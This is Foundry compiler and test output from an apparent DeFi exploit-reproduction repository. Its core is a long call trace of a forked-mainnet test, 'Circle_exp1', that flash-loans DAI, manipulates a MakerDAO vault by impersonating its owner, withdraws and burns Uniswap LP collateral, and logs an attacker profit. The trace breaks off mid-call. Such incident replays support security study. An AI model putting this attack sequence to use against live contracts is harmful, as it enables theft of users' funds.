Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.20s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2022-08/Circle_exp1.sol:114:9:
    |
114 |         address initiator,
    |         ^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2022-08/Circle_exp1.sol:115:9:
    |
115 |         address token,
    |         ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2022-08/Circle_exp1.sol:116:9:
    |
116 |         uint256 amount,
    |         ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2022-08/Circle_exp1.sol:117:9:
    |
117 |         uint256 fee,
    |         ^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2022-08/Circle_exp1.sol:118:9:
    |
118 |         bytes calldata data
    |         ^^^^^^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
   --> src/test/2022-08/Circle_exp1.sol:121:9:
    |
121 |         Urn memory urn = IMakerVat(make_mcd_vat).urns(
    |         ^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
   --> src/test/2022-08/Circle_exp1.sol:125:9:
    |
125 |         Ilk memory ilk =
    |         ^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
   --> src/test/2022-08/Circle_exp1.sol:142:10:
    |
142 |         (uint256 amount0, uint256 amount1) = IUniv2Token(univ2_token).burn(address(this));
    |          ^^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
   --> src/test/2022-08/Circle_exp1.sol:142:27:
    |
142 |         (uint256 amount0, uint256 amount1) = IUniv2Token(univ2_token).burn(address(this));
    |                           ^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 521.81ms (1.78ms CPU time)

Ran 1 test for src/test/2022-08/Circle_exp1.sol:Circle
[PASS] testExploit() (gas: 704540)
Logs:
  [Begin] Attacker Circle before exploit: 0.000000
  [End] Attacker Circle after exploit: 50562.510837

Traces:
  [5779] Circle::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 15331019 [1.533e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [885941] Circle::testExploit()
    ├─ [9815] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker Circle before exploit", val: 0, decimals: 6)
    ├─ [858386] 0x1EB4CF3A948E7D72A198fe073cCb8C7a948cD853::flashLoan(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x6B175474E89094C44Da98b954EedeAC495271d0F, 2437926935218598618037988 [2.437e24], 0x30783030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303665393730303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030)
    │   ├─ [61864] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::suck(0x1EB4CF3A948E7D72A198fe073cCb8C7a948cD853, 0x1EB4CF3A948E7D72A198fe073cCb8C7a948cD853, 2437926935218598618037988000000000000000000000000000 [2.437e51])
    │   │   ├─  emit topic 0: 0xf24e23eb00000000000000000000000000000000000000000000000000000000
    │   │   │        topic 1: 0x0000000000000000000000001eb4cf3a948e7d72a198fe073ccb8c7a948cd853
    │   │   │        topic 2: 0x0000000000000000000000001eb4cf3a948e7d72a198fe073ccb8c7a948cd853
    │   │   │        topic 3: 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000
    │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e0f24e23eb0000000000000000000000001eb4cf3a948e7d72a198fe073ccb8c7a948cd8530000000000000000000000001eb4cf3a948e7d72a198fe073ccb8c7a948cd85300000000000000000000068418e8a797638e107bdc2657c1271fc86ea000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─  storage changes:
    │   │   │   @ 7: 0x0000000000000000004c2f81892469bf374ff8c69865c7037320430135917245 → 0x0000000000000000004c3605a20d11569ade0942748c1ec49a400b6fd5917245
    │   │   │   @ 0x549e6cf29ba52efb67c58ebab853532d1d7f5a297ef4890715b20495031a6865: 0 → 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000
    │   │   │   @ 8: 0x00000000000000000003e3ffe4eafc2d4ecd4220c13761aab6d5a2d44f3c1b3a → 0x00000000000000000003ea83fdd3a3c4b25b529c9d5db96bddf56b42ef3c1b3a
    │   │   │   @ 0xcbd9d6e89a85a59ad162b4dcca4cf851d6f3567292c19860fa85efaa0fbe4db2: 0 → 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000
    │   │   └─ ← [Stop]
    │   ├─ [59201] 0x9759A6Ac90977b93B58547b4A71c78317f391A28::exit(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2437926935218598618037988 [2.437e24])
    │   │   ├─ [12843] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::move(0x1EB4CF3A948E7D72A198fe073cCb8C7a948cD853, 0x9759A6Ac90977b93B58547b4A71c78317f391A28, 2437926935218598618037988000000000000000000000000000 [2.437e51])
    │   │   │   ├─  emit topic 0: 0xbb35783b00000000000000000000000000000000000000000000000000000000
    │   │   │   │        topic 1: 0x0000000000000000000000001eb4cf3a948e7d72a198fe073ccb8c7a948cd853
    │   │   │   │        topic 2: 0x0000000000000000000000009759a6ac90977b93b58547b4a71c78317f391a28
    │   │   │   │        topic 3: 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000
    │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e0bb35783b0000000000000000000000001eb4cf3a948e7d72a198fe073ccb8c7a948cd8530000000000000000000000009759a6ac90977b93b58547b4a71c78317f391a2800000000000000000000068418e8a797638e107bdc2657c1271fc86ea000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xcbd9d6e89a85a59ad162b4dcca4cf851d6f3567292c19860fa85efaa0fbe4db2: 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000 → 0
    │   │   │   │   @ 0x7adce341587c7ad28f80a9ef54da0d2f0bfd917b11856be2d246a8c66685b1a0: 0x0000000000000000004763b31013773783d7103bf986fba2fa3900f1c0000000 → 0x000000000000000000476a3728fc1ecee76520b7d5ad53642158c96060000000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [31845] 0x6B175474E89094C44Da98b954EedeAC495271d0F::mint(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2437926935218598618037988 [2.437e24])
    │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2437926935218598618037988 [2.437e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0 → 0x00000000000000000000000000000000000000000002044048b2aad40acf7ee4
    │   │   │   │   @ 1: 0x000000000000000000000000000000000000000016180e164567449bb85e63a6 → 0x0000000000000000000000000000000000000000161a12568e19ef6fc32de28a
    │   │   │   └─ ← [Stop]
    │   │   ├─  emit topic 0: 0xef693bed00000000000000000000000000000000000000000000000000000000
    │   │   │        topic 1: 0x0000000000000000000000001eb4cf3a948e7d72a198fe073ccb8c7a948cd853
    │   │   │        topic 2: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │        topic 3: 0x00000000000000000000000000000000000000000002044048b2aad40acf7ee4
    │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e0ef693bed0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000002044048b2aad40acf7ee4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   └─ ← [Stop]
    │   ├─  emit topic 0: 0x0d7d75e01ab95780d3cd1c8ec0dd6c2ce19e3a20427eec8bf53283b6fb8e95f0
    │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │           data: 0x0000000000000000000000006b175474e89094c44da98b954eedeac495271d0f00000000000000000000000000000000000000000002044048b2aad40acf7ee40000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [630851] Circle::onFlashLoan(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x6B175474E89094C44Da98b954EedeAC495271d0F, 2437926935218598618037988 [2.437e24], 0, 0x30783030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303665393730303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030)
    │   │   ├─ [2612] 0x5ef30b9986345249bc32d8928B7ee64DE9435E39::urns(28311 [2.831e4]) [staticcall]
    │   │   │   └─ ← [Return] 0x5e33F5A7Dc9c314AbA9Ab4e7c98f2cB7b05f5CCc
    │   │   ├─ [4753] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::urns(0x554e495632444149555344432d41000000000000000000000000000000000000, 0x5e33F5A7Dc9c314AbA9Ab4e7c98f2cB7b05f5CCc) [staticcall]
    │   │   │   └─ ← [Return] Urn({ ink: 4419047108610724500 [4.419e18], art: 9676615809589122661319903 [9.676e24] })
    │   │   ├─ [11094] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::ilks(0x554e495632444149555344432d41000000000000000000000000000000000000) [staticcall]
    │   │   │   └─ ← [Return] Ilk({ Art: 183032701748019531697751107 [1.83e26], rate: 1007760143914245188795121687 [1.007e27], spot: 2208344789931656159662817647058823 [2.208e33], line: 204453061854597280195818004343463859948888950303957509 [2.044e53], dust: 15000000000000000000000000000000000000000000000000 [1.5e49] })
    │   │   ├─ [602] 0x6B175474E89094C44Da98b954EedeAC495271d0F::balanceOf(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 2437926935218598618037988 [2.437e24]
    │   │   ├─ [24514] 0x6B175474E89094C44Da98b954EedeAC495271d0F::approve(0x9759A6Ac90977b93B58547b4A71c78317f391A28, 2437926935218598618037988 [2.437e24])
    │   │   │   ├─ emit Approval(owner: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x9759A6Ac90977b93B58547b4A71c78317f391A28, value: 2437926935218598618037988 [2.437e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xdf7dea2811b92629425ed3dfe2dd565333a2fe90d4bcf9ce80117e8eb51e04d9: 0 → 0x00000000000000000000000000000000000000000002044048b2aad40acf7ee4
    │   │   │   └─ ← [Return] true
    │   │   ├─ [40293] 0x9759A6Ac90977b93B58547b4A71c78317f391A28::join(0x5e33F5A7Dc9c314AbA9Ab4e7c98f2cB7b05f5CCc, 2437926935218598618037988 [2.437e24])
    │   │   │   ├─ [29943] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::move(0x9759A6Ac90977b93B58547b4A71c78317f391A28, 0x5e33F5A7Dc9c314AbA9Ab4e7c98f2cB7b05f5CCc, 2437926935218598618037988000000000000000000000000000 [2.437e51])
    │   │   │   │   ├─  emit topic 0: 0xbb35783b00000000000000000000000000000000000000000000000000000000
    │   │   │   │   │        topic 1: 0x0000000000000000000000009759a6ac90977b93b58547b4a71c78317f391a28
    │   │   │   │   │        topic 2: 0x0000000000000000000000005e33f5a7dc9c314aba9ab4e7c98f2cb7b05f5ccc
    │   │   │   │   │        topic 3: 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e0bb35783b0000000000000000000000009759a6ac90977b93b58547b4a71c78317f391a280000000000000000000000005e33f5a7dc9c314aba9ab4e7c98f2cb7b05f5ccc00000000000000000000068418e8a797638e107bdc2657c1271fc86ea000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x7adce341587c7ad28f80a9ef54da0d2f0bfd917b11856be2d246a8c66685b1a0: 0x000000000000000000476a3728fc1ecee76520b7d5ad53642158c96060000000 → 0x0000000000000000004763b31013773783d7103bf986fba2fa3900f1c0000000
    │   │   │   │   │   @ 0x9c2d422d69935d8f0e18fe3b78260e273f44716080f18884bb4e65619fcd840b: 0 → 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [4503] 0x6B175474E89094C44Da98b954EedeAC495271d0F::burn(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2437926935218598618037988 [2.437e24])
    │   │   │   │   ├─ emit Transfer(from: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 2437926935218598618037988 [2.437e24])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 1: 0x0000000000000000000000000000000000000000161a12568e19ef6fc32de28a → 0x000000000000000000000000000000000000000016180e164567449bb85e63a6
    │   │   │   │   │   @ 0xdf7dea2811b92629425ed3dfe2dd565333a2fe90d4bcf9ce80117e8eb51e04d9: 0x00000000000000000000000000000000000000000002044048b2aad40acf7ee4 → 0
    │   │   │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0x00000000000000000000000000000000000000000002044048b2aad40acf7ee4 → 0
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─  emit topic 0: 0x3b4da69f00000000000000000000000000000000000000000000000000000000
    │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │        topic 2: 0x0000000000000000000000005e33f5a7dc9c314aba9ab4e7c98f2cb7b05f5ccc
    │   │   │   │        topic 3: 0x00000000000000000000000000000000000000000002044048b2aad40acf7ee4
    │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e03b4da69f0000000000000000000000005e33f5a7dc9c314aba9ab4e7c98f2cb7b05f5ccc00000000000000000000000000000000000000000002044048b2aad40acf7ee4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x9c2d422d69935d8f0e18fe3b78260e273f44716080f18884bb4e65619fcd840b: 0 → 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [0] VM::prank(0xfd51531b26f9Be08240f7459Eea5BE80D5B047D9)
    │   │   │   └─ ← [Return]
    │   │   ├─ [63350] 0x5ef30b9986345249bc32d8928B7ee64DE9435E39::frob(28311 [2.831e4], -1104761777152681125 [-1.104e18], -2419153952397280665329975 [-2.419e24])
    │   │   │   ├─ [48757] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::frob(0x554e495632444149555344432d41000000000000000000000000000000000000, 0x5e33F5A7Dc9c314AbA9Ab4e7c98f2cB7b05f5CCc, 0x5e33F5A7Dc9c314AbA9Ab4e7c98f2cB7b05f5CCc, 0x5e33F5A7Dc9c314AbA9Ab4e7c98f2cB7b05f5CCc, -1104761777152681125 [-1.104e18], -2419153952397280665329975 [-2.419e24])
    │   │   │   │   ├─  emit topic 0: 0x7608870300000000000000000000000000000000000000000000000000000000
    │   │   │   │   │        topic 1: 0x554e495632444149555344432d41000000000000000000000000000000000000
    │   │   │   │   │        topic 2: 0x0000000000000000000000005e33f5a7dc9c314aba9ab4e7c98f2cb7b05f5ccc
    │   │   │   │   │        topic 3: 0x0000000000000000000000005e33f5a7dc9c314aba9ab4e7c98f2cb7b05f5ccc
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e076088703554e495632444149555344432d410000000000000000000000000000000000000000000000000000000000005e33f5a7dc9c314aba9ab4e7c98f2cb7b05f5ccc0000000000000000000000005e33f5a7dc9c314aba9ab4e7c98f2cb7b05f5ccc0000000000000000000000005e33f5a7dc9c314aba9ab4e7c98f2cb7b05f5cccfffffffffffffffffffffffffffffffffffffffffffffffff0ab190457629b5bfffffffffffffffffffffffffffffffffffffffffffdffb966c631a274411ec900000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x57584a023809dc5166ced10161d7d63d27484397eb55989bd119c59dbe7cbfeb: 0x0000000000000000000000000000000000000000000000003d539beea2759294 → 0x0000000000000000000000000000000000000000000000002dfeb4f2f9d82def
    │   │   │   │   │   @ 0xfb3a1d9a443ddea5a26f85362506d9d697c3db059c722e5ea9f952ea7efa270c: 0 → 0x0000000000000000000000000000000000000000000000000f54e6fba89d64a5
    │   │   │   │   │   @ 7: 0x0000000000000000004c3605a20d11569ade0942748c1ec49a400b6fd5917245 → 0x0000000000000000004c2f81892469bf374ff8c69a3b355f44244baf02077654
    │   │   │   │   │   @ 0x57584a023809dc5166ced10161d7d63d27484397eb55989bd119c59dbe7cbfec: 0x00000000000000000000000000000000000000000008011a64e739762efb84df → 0x0000000000000000000000000000000000000000000600d3cbad6b18a33ca3a8
    │   │   │   │   │   @ 0x9c2d422d69935d8f0e18fe3b78260e273f44716080f18884bb4e65619fcd840b: 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000 → 0x000000000000000000000000000000000000000001d56e5bd10408adcc76040f
    │   │   │   │   │   @ 0x01609d741d5d482033fe9bbffe1718602984b3ada87e0cf9c7656350e5c157c9: 0x0000000000000000000000000000000000000000009766aea4c000584fba0443 → 0x0000000000000000000000000000000000000000009566680b8631fac3fb230c
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─  emit topic 0: 0x45e6bdcd00000000000000000000000000000000000000000000000000000000
    │   │   │   │        topic 1: 0x000000000000000000000000fd51531b26f9be08240f7459eea5be80d5b047d9
    │   │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000000000000000006e97
    │   │   │   │        topic 3: 0xfffffffffffffffffffffffffffffffffffffffffffffffff0ab190457629b5b
    │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e045e6bdcd0000000000000000000000000000000000000000000000000000000000006e97fffffffffffffffffffffffffffffffffffffffffffffffff0ab190457629b5bfffffffffffffffffffffffffffffffffffffffffffdffb966c631a274411ec900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [0] VM::prank(0xfd51531b26f9Be08240f7459Eea5BE80D5B047D9)
    │   │   │   └─ ← [Return]
    │   │   ├─ [34857] 0x5ef30b9986345249bc32d8928B7ee64DE9435E39::flux(28311 [2.831e4], Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1104761777152681125 [1.104e18])
    │   │   │   ├─ [28307] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::flux(0x554e495632444149555344432d41000000000000000000000000000000000000, 0x5e33F5A7Dc9c314AbA9Ab4e7c98f2cB7b05f5CCc, Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1104761777152681125 [1.104e18])
    │   │   │   │   ├─  emit topic 0: 0x6111be2e00000000000000000000000000000000000000000000000000000000
    │   │   │   │   │        topic 1: 0x554e495632444149555344432d41000000000000000000000000000000000000
    │   │   │   │   │        topic 2: 0x0000000000000000000000005e33f5a7dc9c314aba9ab4e7c98f2cb7b05f5ccc
    │   │   │   │   │        topic 3: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e06111be2e554e495632444149555344432d410000000000000000000000000000000000000000000000000000000000005e33f5a7dc9c314aba9ab4e7c98f2cb7b05f5ccc0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000f54e6fba89d64a50000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xfb3a1d9a443ddea5a26f85362506d9d697c3db059c722e5ea9f952ea7efa270c: 0x0000000000000000000000000000000000000000000000000f54e6fba89d64a5 → 0
    │   │   │   │   │   @ 0xc8e728e12205a06dd7ab59e670231101077c2fdf2371c26ad84245377f65112a: 0 → 0x0000000000000000000000000000000000000000000000000f54e6fba89d64a5
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─  emit topic 0: 0x9bb8f83800000000000000000000000000000000000000000000000000000000
    │   │   │   │        topic 1: 0x000000000000000000000000fd51531b26f9be08240f7459eea5be80d5b047d9
    │   │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000000000000000006e97
    │   │   │   │        topic 3: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e09bb8f8380000000000000000000000000000000000000000000000000000000000006e970000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000f54e6fba89d64a500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [51940] 0xA81598667AC561986b70ae11bBE2dd5348ed4327::exit(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1104761777152681125 [1.104e18])
    │   │   │   ├─ [7584] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::slip(0x554e495632444149555344432d41000000000000000000000000000000000000, Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], -1104761777152681125 [-1.104e18])
    │   │   │   │   ├─  emit topic 0: 0x7cdd3fde00000000000000000000000000000000000000000000000000000000
    │   │   │   │   │        topic 1: 0x554e495632444149555344432d41000000000000000000000000000000000000
    │   │   │   │   │        topic 2: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │        topic 3: 0xfffffffffffffffffffffffffffffffffffffffffffffffff0ab190457629b5b
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e07cdd3fde554e495632444149555344432d410000000000000000000000000000000000000000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496fffffffffffffffffffffffffffffffffffffffffffffffff0ab190457629b5b00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc8e728e12205a06dd7ab59e670231101077c2fdf2371c26ad84245377f65112a: 0x0000000000000000000000000000000000000000000000000f54e6fba89d64a5 → 0
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [29840] 0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5::transfer(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1104761777152681125 [1.104e18])
    │   │   │   │   ├─ emit Transfer(from: 0xA81598667AC561986b70ae11bBE2dd5348ed4327, to: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1104761777152681125 [1.104e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000000000f54e6fba89d64a5
    │   │   │   │   │   @ 0xabd6970fcd0f87d395d9849da9e2c513c3647d5529674e8bdf8f0a8321c5870f: 0x00000000000000000000000000000000000000000000000488267b78425ab3f9 → 0x00000000000000000000000000000000000000000000000478d1947c99bd4f54
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  emit topic 0: 0xef693bed00000000000000000000000000000000000000000000000000000000
    │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │        topic 2: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │        topic 3: 0x0000000000000000000000000000000000000000000000000f54e6fba89d64a5
    │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e0ef693bed0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000f54e6fba89d64a5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [25040] 0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5::transfer(0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5, 1104761777152681125 [1.104e18])
    │   │   │   ├─ emit Transfer(from: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5, value: 1104761777152681125 [1.104e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xcd8e9071a8d839ad089c7f246e7822483edcf59cdf4c36cfaeaff256f12de51d: 0 → 0x0000000000000000000000000000000000000000000000000f54e6fba89d64a5
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000f54e6fba89d64a5 → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [118041] 0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5::burn(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
